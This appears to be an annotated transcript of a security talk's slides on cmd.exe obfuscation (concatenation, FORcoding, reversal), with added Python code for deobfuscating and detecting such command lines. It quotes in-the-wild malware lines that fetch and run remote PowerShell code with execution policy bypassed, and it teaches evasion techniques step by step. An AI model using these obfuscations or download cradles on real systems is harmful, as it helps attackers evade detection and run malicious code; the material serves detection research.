• Comma & semicolon :: ;,,CMd,; ,/C ", ;, ;sEt coM3= /ano&&,,,SEt cOm2=stat&&;;;seT CoM1=net&&, ;caLl,;,SeT fiNAl=%COm1%%cOm2%%coM3%&&; , ,cAlL, ;, ;%FinAl% "
• Caret :: ;,,C^Md^,; ,^/^C^ ^ ", ;, ;s^Et ^ ^ co^M3=^^ /^^an^o&&,,,S^Et^ ^ ^cO^m2=^s^^ta^^t&&;;;s^eT^ ^ C^oM1^=^n^^et&&, ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%&&; , ,c^AlL^, ;,^ ;%Fi^nAl^% "
  • Carets inside the quoted /C payload are left alone by the outer shell (quotes suppress caret processing); the inner cmd.exe strips one layer when it parses the line and call strips another when it re-parses the expanded values, which is why ^^ /^^an^o still ends up as /ano.
• Parentheses :: ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
Payload Obfuscation 1 of 4: Concatenation (slides 115–116)
• Process execution layers for the fully wrapped command:
  1. The spawned cmd.exe, as logged (the doubled %'s are the Sysmon artifact from the detour): CMd ,; ,/C ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%%COm1^%%%%c^Om2%%^%%c^oM3^%%))&&; (, ,(c^AlL^, ;,^ ;%%Fi^nAl^%%) ) "
  2. Final process: netstat /ano
• Pairing "" inside a set value (C^oM1^=^n^^e""t) carries the quotes through into the final process: ne""tstat /ano
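The set/call concatenation of slides 93–116 can be undone statically, which is what an analyst has to do when only the cmd.exe command line was logged, as for the internal commands of slide 81 that spawn no child. The block below is an added example written for this transcript; it is not code from the deck or from Invoke-DOSfuscation. It strips the cmd.exe-only decoration (carets, parentheses, comma/semicolon padding), optionally folds back the doubled %'s that the #TestYourTools detour attributes to Sysmon, replays set, call and %VAR% expansion, and finishes with a comparison key that neutralises the switch-prefix and flag-order tricks of slides 70–71 and 84–92. All function names are this example's own, only plain %NAME% expansion is replayed, and && is assumed not to appear inside quotes.

```python
"""Static resolver for the set/call concatenation payloads on slides 93-116 (added
example; not Invoke-DOSfuscation code). It strips the cmd.exe-only decoration,
optionally undoes Sysmon's %-doubling from the #TestYourTools detour, and replays
set / call / %VAR% expansion to recover the command line that leaves cmd.exe; it
also surfaces the slide-81 internal commands that never spawn a child process.
Simplifications: only plain %NAME% expansion is replayed, && is assumed not to
occur inside quotes, and parse-time expansion of a not-yet-set %VAR% is treated
as the literal it stays on the command line.
"""
import re

_SET = re.compile(r"set\s+([^=]+?)\s*=(.*)$", re.I | re.S)
_CALL = re.compile(r"call[\s,;]+(.*)$", re.I | re.S)
_CMD_C = re.compile(r'(?:[^\s"]*\\)?cmd(?:\.exe)?\b.*?/c[\s,;]*(.*)$', re.I | re.S)
_VAR = re.compile(r"%([^%]+)%")

def undo_sysmon_doubling(cmdline):
    """Sysmon EID 1 CommandLine writes every % twice; fold the pairs back
    (assumes the original line held no literal %%)."""
    return cmdline.replace("%%", "%")

def clean(segment):
    """Drop carets plus the , ; ( ) and whitespace padding at either end of a
    token run. Double quotes stay: they reach the final process (slide 116)."""
    return re.sub(r"^[\s,;(]+|[\s,;)]+$", "", segment.replace("^", ""))

def expand(text, env):
    """Execution-time %NAME% expansion; undefined names stay literal."""
    return _VAR.sub(lambda m: env.get(m.group(1).upper(), m.group(0)), text)

def run(segment, env):
    """Replay one command; return the external command line it launches, or
    None when it only changed the environment."""
    seg = clean(segment)
    m = _SET.match(seg)
    if m:
        env[m.group(1).strip().upper()] = m.group(2)
        return None
    m = _CALL.match(seg)
    if m:                                    # call re-expands the line, then runs it
        return run(expand(m.group(1), env), env)
    if _CMD_C.match(seg):                    # cmd /c ... : the child gets a copy of env
        return resolve(seg, dict(env))
    left, bar, right = seg.partition("|")
    if bar and clean(right).lower().startswith("cmd") and clean(left).lower().startswith("echo"):
        return resolve(clean(left)[4:], dict(env))   # echo X | cmd : X arrives on StdIn
    return expand(seg, env)

def resolve(cmdline, env=None, from_sysmon=False):
    """Resolve a cmd /c "..." line (or a bare && chain) to the command that finally runs."""
    env = {} if env is None else env
    text = clean(undo_sysmon_doubling(cmdline) if from_sysmon else cmdline)
    m = _CMD_C.match(text)
    if m:                                    # unwrap the cmd /c "..." layer
        return resolve(m.group(1), dict(env))
    if text.startswith('"') and text.endswith('"'):
        text = text[1:-1]
    final = None
    for segment in text.split("&&"):
        final = run(segment, env)
        if final is not None:
            break
    return final

def canonical(cmdline):
    """Comparison key for a final command line: quotes removed, binary lower-cased,
    switch prefixes unified to '-' and letter-only switch groups sorted, so that
    netstat -ano, netstat /ano and neTST""at -No""a all become 'netstat -ano'
    (a key for matching, not a runnable command)."""
    tokens = cmdline.replace('"', "").split()
    out = [tokens[0].lower()] if tokens else []
    for tok in tokens[1:]:
        m = re.fullmatch(r"[-/]([A-Za-z]+)", tok)
        out.append("-" + "".join(sorted(m.group(1).lower())) if m else tok)
    return " ".join(out)
```

resolve() returns "netstat /ano" for every variant on slides 99–114, including the five final-syntax forms of slide 107 (the PowerShell forms come back as the powershell command line they launch), and returns 'ne""tstat /ano' for the slide-116 variant because clean() deliberately keeps double quotes. Pass from_sysmon=True for a line copied out of Sysmon EID 1 so the %%-doubling is removed first. canonical() is the key to compare or alert on; it is not meant to be executed.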
117
ne""tstat /ano
vs
n"e"tstat /ano
Payload Obfuscation 1 of 4: Concatenation
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
118
ne""tstat /ano
vs
n"e"tstat /ano
Payload Obfuscation 1 of 4: Concatenation
119
✘ If we have to pair double quotes, how can we unpair them in the final variable?
Payload Obfuscation 1 of 4: Concatenation
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
121
• Steps for unpaired quotes
1. Double up quotes
Payload Obfuscation 1 of 4: Concatenation
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
122
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
Payload Obfuscation 1 of 4: Concatenation
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^ %) ) "
123
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
Payload Obfuscation 1 of 4: Concatenation
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""= %) ) "
124
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
Payload Obfuscation 1 of 4: Concatenation
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=%quotes:~0,1%%) ) "
125
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
Payload Obfuscation 1 of 4: Concatenation
126
✘ ✘ Nesting %quotes:~0,1% inside %final:""=...% does not work: percent expansion is a single pass and does not nest, so the inner %...% is never resolved.
Payload Obfuscation 1 of 4: Concatenation
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=%quotes:~0,1%%) ) "
127
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, (( ;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^:""=!quotes:~0,1!%) ) "
128
Payload Obfuscation 1 of 4: Concatenation
132
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. Variable expansion (delayed expansion, enabled with /V; whatever follows /V is ignored, so all of these enable it)
• /V:ON
• /V:O
• /V:
• /V
• /VISTA
• /VM
• /V*
Payload Obfuscation 1 of 4: Concatenation
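The expansion rules those four steps lean on, modelled in Python as an added example (this is not code from the talk or from Invoke-DOSfuscation). It runs the slide's building blocks, with the comma/semicolon/parenthesis noise already removed, through a deliberately small model of cmd.exe: one parse-time %-pass over the whole line, caret stripping outside double quotes, delayed !var! expansion, and CALL's second %-pass. The model's assumptions are labelled in the code: names are case-insensitive, an undefined %var% on a command line is left in place, and delayed expansion runs before CALL re-parses its argument.

```python
"""Model of the cmd.exe expansion rules behind the four quote-unpairing steps.
Added example, not code from the talk or from Invoke-DOSfuscation.  Labelled
assumptions: variable names are case-insensitive; an undefined %var% on a
command line is left untouched (a .bat would drop it); delayed !var! expansion
happens before CALL re-parses its argument; CALL's re-parse is modelled as one
more %-pass followed by one more caret pass."""
import re

# Constructed input: the slide's building blocks with the ,;() noise removed.
PAYLOAD = ('set coM3=^^ /^^an^o&&set cOm2=^s^^ta^^t&&set CoM1=^n""^^e""t'
           '&&set quotes=""&&call set fiNAl=%COm1%%cOm2%%cOm3%'
           '&&call %final:""=!quotes:~0,1!%')
# The earlier attempt (the two-cross slide) that nests %...% inside %...%.
NESTED_PERCENT = PAYLOAD.replace('!quotes:~0,1!', '%quotes:~0,1%')

_PCT = re.compile(r'%([^%:!]+)(?::~(-?\d+)(?:,(-?\d+))?|:([^=%]+)=([^%]*))?%')
_BANG = re.compile(r'!([^!:%]+)(?::~(-?\d+)(?:,(-?\d+))?)?!')


def strip_carets(s):
    """^x -> x and ^^ -> ^ outside double quotes; inside quotes carets are literal.
    An empty "" pair toggles quoting twice, which is why n""^^e""t keeps working."""
    out, quoted, i = [], False, 0
    while i < len(s):
        c = s[i]
        if c == '"':
            quoted = not quoted
        elif c == '^' and not quoted and i + 1 < len(s):
            i += 1
            c = s[i]
        out.append(c)
        i += 1
    return ''.join(out)


def _substring_or_replace(value, start, length, find, repl):
    """%var:~start,len% substring and %var:find=repl% substitution."""
    if start is not None:
        value = value[int(start):]
        if length is not None:
            value = value[:int(length)]
    elif find is not None:
        value = value.replace(find, repl)
    return value


def expand_percent(line, env):
    def repl(m):
        name = m.group(1).upper()
        if name not in env:
            return m.group(0)          # command-line behaviour: left as-is
        return _substring_or_replace(env[name], m.group(2), m.group(3),
                                     m.group(4), m.group(5))
    return _PCT.sub(repl, line)


def expand_delayed(line, env):
    def repl(m):
        value = env.get(m.group(1).upper(), '')   # undefined !var! -> empty
        return _substring_or_replace(value, m.group(2), m.group(3), None, None)
    return _BANG.sub(repl, line)


def execute(segment, env):
    """One &&-segment: caret pass, delayed expansion, then SET / CALL.
    Returns the command that would finally run, or None for SET."""
    segment = expand_delayed(strip_carets(segment.strip()), env)
    verb, _, rest = segment.partition(' ')
    if verb.lower() == 'call':         # CALL: second %-pass, then carets again
        return execute(expand_percent(rest, env), env)
    if verb.lower() == 'set':
        name, _, value = rest.partition('=')
        env[name.strip().upper()] = value
        return None
    return segment


def run_line(cmdline):
    """cmd /V /C "<cmdline>": one parse-time %-pass over the whole line (nothing
    is defined yet, so every %var% survives literally), then the segments run."""
    env, result = {}, None
    for segment in expand_percent(cmdline, env).split('&&'):
        result = execute(segment, env)
    return result


if __name__ == '__main__':
    print(run_line(PAYLOAD))            # n"e"tstat /ano
    print(run_line(NESTED_PERCENT))     # mangled: the inner %...% never expands
```

Running it yields n"e"tstat /ano for the !quotes:~0,1! form and a mangled string for the nested %quotes:~0,1% form: %-expansion is one left-to-right pass, so %final:""=% closes at the first % it meets, and only a /V-enabled !...! can inject the quote after the substitution syntax has already been parsed. The strip_carets model also shows why the n"^^e"t attempt fails: inside a quoted region the carets are literal and survive into the value.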
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ --$#$--=^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^!!#**#!!=^s^^ta^^t)&&(;(;;s^eT^ ^ ……...=^n""^^e""t) ) &&set ;;;;;;;;;=""&&, (( ;c^aLl,^;,S^e^T ^ ^ '''''''''''''''=^%……...%%!!#**#!!%^%--$#$--%))&&; (, ,(c^AlL^, ;,^ ;%''''''''''''''':""=!;;;;;;;;;:~0,1!%) ) "
134
• Env var names can be:
1. Special characters
Payload Obfuscation 1 of 4: Concatenation
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ ' =^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^' =^s^^ta^^t)&&(;(;;s^eT^ ^ ' =^n""^^e""t) ) &&set ' =""&&, (( ;c^aLl,^;,S^e^T ^ ^ ' =^%' %%' %^%' %))&&; (, ,(c^AlL^, ;,^ ;%' :""=!' :~0,1!%) ) "
135
• Env var names can be:
1. Special characters
2. Whitespace
Payload Obfuscation 1 of 4: Concatenation
• Concatenation examples in the wild (1/3):
137
..\..\..\..\Windows\System32\cmd.exe /c "set da=wersh&& set gg=ell&& set c0=po&&" cmd /c %c0%%da%%gg% -nonI -eP bypass -c iEx ((n`eW-OBjECt ('n'+'Et.w'+'EbclIe'+'nT')).('do'+'wNlo'+'adst'+'ring').Invoke(('h'+$s4+'t'+'t'+$o8+'ps://'+…
Invoke-Obfuscation payload
Payload Obfuscation 1 of 4: Concatenation (ITW 1/3)
• Concatenation examples in the wild (2/3):
138
CmD wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL)
Invoke-Obfuscation payload
Payload Obfuscation 1 of 4: Concatenation (ITW 2/3)
• Concatenation examples in the wild (3/3):
139
cmd.exe /C "cm^d^.^e^x^e /V^ ^/C s^et g^c^=^er^s^&^&s^e^t ^tf=^he^ll^&^&set^ f^a^=^pow^&^&^s^et^ dq^=W^i^n^do^ws^!fa^!^!g^c^!!^t^f^!\^v^1^.0\^!^fa!^!^gc!!^tf^!^&^&^ ech^o^ iE^X^(^^"iex(neW-OBjecT nEt.webCLiEnt).dowNlOaDstrING('https://REDACTED')^"^)^;^ ^|^ !dq! -^no^p^ ^-^w^i^n^ ^1^ ^-"
!dq! == WindowsPowerShell\v1.0\powershell
Payload Obfuscation 1 of 4: Concatenation (ITW 3/3)
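One way to turn the three in-the-wild samples above into detection logic, as an added example (not the talk's or Invoke-DOSfuscation's own detection code): a weighted indicator score over a process command line. The indicators, weights and threshold are this example's own heuristics; ITW1 to ITW3 are the slide samples (ITW1 truncated as on the slide) and BENIGN is a constructed control line.

```python
"""Weighted indicator score for cmd.exe obfuscation of the kind seen in the
three in-the-wild concatenation samples above.  Added example; the indicators,
weights and threshold are this example's own heuristics, not the talk's
detection logic.  ITW1..3 are the slide samples (ITW1 truncated as on the
slide); BENIGN is a constructed control line."""
import re

ITW1 = r"""..\..\..\..\Windows\System32\cmd.exe /c "set da=wersh&& set gg=ell&& set c0=po&&" cmd /c %c0%%da%%gg% -nonI -eP bypass -c iEx ((n`eW-OBjECt ('n'+'Et.w'+'EbclIe'+'nT')).('do'+'wNlo'+'adst'+'ring').Invoke(('h'+$s4+'t'+'t'+$o8+'ps://'+..."""
ITW2 = r"""CmD wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL)"""
ITW3 = r'''cmd.exe /C "cm^d^.^e^x^e /V^ ^/C s^et g^c^=^er^s^&^&s^e^t ^tf=^he^ll^&^&set^ f^a^=^pow^&^&^s^et^ dq^=W^i^n^do^ws^!fa^!^!g^c^!!^t^f^!\^v^1^.0\^!^fa!^!^gc!!^tf^!^&^&^ ech^o^ iE^X^(^^"iex(neW-OBjecT nEt.webCLiEnt).dowNlOaDstrING('https://REDACTED')^"^)^;^ ^|^ !dq! -^no^p^ ^-^w^i^n^ ^1^ ^-"'''
BENIGN = r'cmd.exe /c dir C:\Users\public /s'     # constructed control

# (name, weight, test(raw_line, caret_stripped_line)); all heuristics are this
# example's own choices.
INDICATORS = [
    # escape carets are the signature of cmd's phase-2 abuse
    ('carets', 2, lambda raw, s: raw.count('^') >= 3),
    # two or more adjacent %var% / !var! / !%var%! expansions building a token
    ('var_chain', 2, lambda raw, s: re.search(r'(?:[%!]%?\w+%?[%!]){2,}', s) is not None),
    # three or more SET statements on one command line
    ('many_sets', 1, lambda raw, s: len(re.findall(r'\bset\s+\S+=', s, re.I)) >= 3),
    # %ComSpec% used to reach cmd.exe without naming it
    ('comspec', 1, lambda raw, s: re.search(r'%comspec%', s, re.I) is not None),
    # /V (any suffix) turns on delayed expansion, needed for !var! tricks
    ('delayed_expansion', 1, lambda raw, s: re.search(r'\s/v', s, re.I) is not None),
]
THRESHOLD = 3


def score(cmdline):
    """Return (total weight, [names of indicators that fired]) for one line."""
    stripped = re.sub(r'\^(.)', r'\1', cmdline)      # one caret pass: ^x -> x
    hits = [(name, w) for name, w, test in INDICATORS if test(cmdline, stripped)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def is_suspicious(cmdline):
    return score(cmdline)[0] >= THRESHOLD


if __name__ == '__main__':
    for label, line in (('ITW1', ITW1), ('ITW2', ITW2), ('ITW3', ITW3), ('BENIGN', BENIGN)):
        total, names = score(line)
        print(f'{label:6} score={total} suspicious={is_suspicious(line)} {names}')
```

The carets are counted on the raw line while every other pattern runs on the caret-stripped copy, since a payload like ITW3 hides `set` and `/V` behind carets and only the stripped form exposes them; ITW1 carries no carets at all and is caught by the %var%%var%%var% chain plus its three SET statements.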
Last of ITW… Unseen Techniques Up Ahead!
For the past 9 months I have hunted across:
• Public file repositories
• Private file repositories
• Sandbox execution reports
• Endpoint detections for 10+ million endpoints
142
FOR Score And Seven Obfuscation Techniques Ago…
Payload Obfuscation 2 of 4: FORcoding
144
• cmd /c netstat /ano
Payload Obfuscation 2 of 4: FORcoding
145
• cmd /v /c netstat /ano
• /V
• /V:ON
• /VERBOSE
• /V:::::::::::
• /V=====
• /V_-/\-_
Payload Obfuscation 2 of 4: FORcoding
147
• cmd /v /c netstat /ano
#ForCompatibilityReasons #RisthenewC
Payload Obfuscation 2 of 4: FORcoding
149
• cmd /v /r netstat /ano
#ForCompatibilityReasons #RisthenewC
Payload Obfuscation 2 of 4: FORcoding
151
• cmd /v /r netstat /ano
Troll-pportunity ™
Payload Obfuscation 2 of 4: FORcoding
152
• cmd Never Gonna Give You Up/vNever Gonna Let You Down/r netstat /ano
Payload Obfuscation 2 of 4: FORcoding
153
• cmd \c echo %PATH% /v /r netstat /ano
Payload Obfuscation 2 of 4: FORcoding
157
• cmd /v /r "set unique=nets /ao&&…"
Payload Obfuscation 2 of 4: FORcoding
158
• cmd /v /r "set unique=nets /ao&&FOR %A IN ( ) DO…"
Index: 0 1 2 3 4 5 6 7
Char:  n e t s ␣ / a o   (␣ = the space at index 4)
Payload Obfuscation 2 of 4: FORcoding
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
Index:  0 1 2 3 4 5 6 7
Char:   n e t s ␣ / a o   (␣ = the space at index 4)
Output: n e t s t a t ␣ / a n o
163
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO…"
Payload Obfuscation 2 of 4: FORcoding
Arbitrary end-of-index delimiter: 1337 is past the end of the string, so !unique:~1337,1! appends nothing and the index only serves as the stop marker.
164
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&…"
Appending the character at each index (%A) to the !final! env var.
Payload Obfuscation 2 of 4: FORcoding
165
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
• Equivalent comparisons for the final IF (each is true only for the sentinel index):
• ==1337
• EQU 1337
• GEQ 1337
• GTR 1336
https://ss64.com/nt/if.html
Payload Obfuscation 2 of 4: FORcoding
167
• cmd /v /r "set unique=OnBeFtUsS C/AaToE&&FOR %A IN (1 3 5 7 5 13 5 9 11 13 1 15 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
Payload Obfuscation 2 of 4: FORcoding
168
Invoke-DOSfuscation functions also wrap all the building block techniques into each input command…
Payload Obfuscation 2 of 4: FORcoding
169
• cMd /v /R "sET unIQuE=OnBeFtUsS C/AaToE&&foR %a iN (1 3 5 7 5 13 5 9 11 13 1 15 1337) dO sEt fINal=!finAl!!uniQue:~%a,1!&&iF %a==1337 CalL %fInAl:~-12%"
• Random case
Payload Obfuscation 2 of 4: FORcoding
170
• cMd/v/R"sET unIQuE=OnBeFtUsS C/AaToE&&foR %a iN (1,3;5,7;5,13;5,9;11,13,1;15,1337)dO sEt fINal=!finAl!!uniQue:~%a,1!&&iF %a==1337 CalL %fInAl:~-12%"
• Random case
• Whitespace (-/+)
Payload Obfuscation 2 of 4: FORcoding
171
• cMd /v /R "sET unIQuE=OnBeFtUsS C/AaToE && foR %a iN ( 1 3 5 7 5 13 5 9 11 13 1 15 1337 ) dO sEt fINal=!finAl!!uniQue:~ %a, 1!&& iF %a == 1337 CalL %fInAl:~ -12% "
• Random case
• Whitespace (-/+)
Payload Obfuscation 2 of 4: FORcoding
172
• ,;cMd;/v;,;/R "sET unIQuE=OnBeFtUsS C/AaToE &&,; foR ;,;%a ,;;iN;,,;( , 1; 3 5 7 5 13 5,,9 11 13 1;;15 1337;,),;,;dO,,;;sEt fINal=!finAl!!uniQue:~ %a, 1!&&;;;iF,, ,%a;;,==,,;1337,;;,CalL;,,;%fInAl:~ -12% "
• Random case
• Whitespace (-/+)
• Comma & semicolon
Payload Obfuscation 2 of 4: FORcoding
173
• ,;c^Md;/^v;,;/^R "sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE &&,; fo^R;,;%^a,;; i^N;,,;( , 1; 3 5 7 5 1^3 5,,9 11 1^3 1;;15 ^ 13^37;,),;,;d^O,,;;s^Et fI^Nal=!finAl!!uni^Que:~ %^a, 1!&&;;i^F,,%^a;,=^=,;13^37,;Ca^lL;,%fIn^Al:~ -^12%"
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
Payload Obfuscation 2 of 4: FORcoding
174
• ,;c^Md;/^v;,;/^R "((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;; i^N;,,;( , 1; 3 5 7 5 1^3 5,,9 11 1^3 1;;15 ^ 13^37;,),;,;d^O,,(;(;s^Et fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a,=^=;13^37,(Ca^lL;%fIn^Al:~ -^12%))"
Invoke-DOSfuscation functions also wrap all the building block techniques into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
• Parentheses
Payload Obfuscation 2 of 4: FORcoding
175
• ,;c^Md;/^v;,;/^R "((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;; i^N;,,;( ,+1; 3 5 7 +5 1^3 +5,,9 11 +1^3 +1;;+15 ^+13^37;,),;,;d^O,,(;(;s^Et fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a=^=+13^37,(Ca^lL;%fIn^Al:~ -^12%))"
Invoke-DOSfuscation functions also wrap all the building block techniques into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
• Parentheses
• Explicit signing
Payload Obfuscation 2 of 4: FORcoding
176
Troll-pportunity ™
Payload Obfuscation 2 of 4: FORcoding
• Reverse: cmd /v /r "set reverse=ona/ tatsten&&FOR /L %A IN (11 -1 0) DO set final=!final!!reverse:~%A,1!&&IF %A==0 CALL %final:~-12%"
• FORcoding: cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
177
Payload Obfuscation 3 of 4: Reversal
Reversing is similar to FORcoding, but has simpler indexing with FOR loop's /L argument.
• Reverse: cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
• FORcoding: cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
178
Payload Obfuscation 3 of 4: Reversal
Reversing is similar to FORcoding, but has simpler indexing with FOR loop's /L argument.
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
179
• ==1
• EQU 1
• LEQ 1
• LSS 2
https://ss64.com/nt/if.html
Payload Obfuscation 3 of 4: Reversal
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
180
Payload Obfuscation 3 of 4: Reversal
C:\> echo %final%
!final!netstat /ano
C:\> echo %final:~-12%
netstat /ano
• cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~7%"
181
Payload Obfuscation 3 of 4: Reversal
C:\> echo %final%
!final!netstat /ano
C:\> echo %final:~7%
netstat /ano
